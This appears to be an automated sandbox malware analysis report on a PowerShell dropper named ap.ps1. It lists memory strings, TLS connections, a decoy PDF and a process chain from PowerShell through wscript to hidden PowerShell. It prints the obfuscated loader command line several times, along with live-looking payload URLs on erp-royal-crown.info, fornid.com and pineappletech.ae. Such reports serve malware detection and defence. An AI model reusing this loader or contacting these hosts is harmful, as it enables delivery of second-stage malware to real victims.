          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/S
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Su
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sub
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subo
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subor
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subord
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordi
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordin
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordine
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordiner
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinere
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordineren
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerend
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerende
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes7
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.s
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD491B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD491B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinualapplualtualch.aual/na/mg.vbs
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.10:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.10:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.10:49784 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173Jump to behavior
          Source: classification engineClassification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flocgjrv.ukm.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: ap.ps1ReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
